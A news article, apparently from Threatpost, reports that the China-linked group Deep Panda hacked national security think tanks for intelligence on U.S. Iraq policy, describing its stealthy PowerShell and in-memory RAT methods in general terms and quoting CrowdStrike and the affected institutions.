Computers at a number of unnamed national security think tanks were compromised by hackers linked to China trying to glean intelligence on U.S. policy in Iraq as civil unrest escalates in the Middle East country.
The attacks mark a shift in tactics by this particular group, which generally keeps tabs on Western policy makers linked to China and Asia Pacific. Experts at Crowdstrike, which has a pro bono relationship with think tanks and provides them detection capabilities, said the group it calls Deep Panda began its Iraq-related operation on June 18, the same day the Islamic State of Iraq and the Levant (ISIS) took control of the Baiji oil refinery, which refines one-third of the country’s crude oil. China is the largest foreign investor in Iraq oil.
“It wouldn’t be surprising if the Chinese government is highly interested in getting a better sense of the possibility of deeper U.S. military involvement that could help protect the Chinese oil infrastructure in Iraq,” wrote Crowdstrike cofounder and CTO Dmitri Alperovitch.
Deep Panda has been active going back at least three years, targeting government agencies and private enterprises in the financial, legal and telecommunications industries. Alperovitch said their interest in national security think tanks leads them to target former senior government officials who are still well connected in Washington and other strategic partner governments.
“The intelligence services of these nation states are always on the lookout for any clues they may extract from such private communications that may give them an advanced insight into what options government policy makers are considering on particular issues of interest,” Alperovitch said.
The Brookings Institution, a well known Washington think tank, would not comment to specific questions for this article.
“Brookings takes security extremely seriously, and we constantly monitor the evolving technology landscape to ensure our systems are as secure as possible. We do not comment on the details of our information security infrastructure,” said Helen Mohrmann, chief information officer in a statement emailed to Threatpost.
The Council on Foreign Relations referred Threatpost to a statement: “The Council’s IT architecture is a priority and we continue to do all we can to reduce our vulnerability. We will not comment on reports of specific incidents.”
Deep Panda, and other nation-state sponsored advanced persistent threat groups, use malware to gain access to computers, establish a remote connection to those machines and move data off them quietly. Stealth, Alperovitch said, is a Deep Panda specialty.
The hackers took great pains to avoid detection in infiltrating the think tanks. They used Windows PowerShell to execute scripts remotely, deploying them as a scheduled task on compromised Windows machines.
“The scripts are passed to the powershell interpreter through the command line to avoid placement of extraneous files on the victim machine that could potentially trigger AV- or Indicator of Compromise (IOC)-based detection,” Alperovitch said.
Every two hours, the scripts would call home to the Deep Panda command and control servers. Once the scripts were executed, a .NET executable called Wafer was downloaded and run that downloads and runs the MadHatter remote access Trojan; the Trojan runs from memory in order to leave few traces that the attackers were there.
“They prefer to operate in a way that leaves a minimal footprint on a victim system and often allows them to evade detection for a very long time,” Alperovitch said.
Once they had access to the think tank networks, they were able to move laterally using stolen credentials, mount network file shares, and encrypt and compress data to move it off the respective networks.
“They knew exactly which users to target based on their research policy area, and they rapidly pivoted from China/Asia Pacific policy experts to Iraq/Middle East policy experts once their tasking collection requirements changed,” Alperovitch said.
Deep Panda was also implicated last year in a watering hole attack against the U.S. Department of Labor Site Exposure Matrices (SEM) website. Researchers at AlienVault linked the command and control infrastructure used in that compromise to Deep Panda. The DOL compromise redirected victims to a site hosting the Poison Ivy remote access Trojan. The SEM website is a repository of data on toxic substances present at Department of Energy facilities, meaning that the targets were likely DoE employees.
This article was updated at 12 p.m. ET with a comment from the Brookings Institution.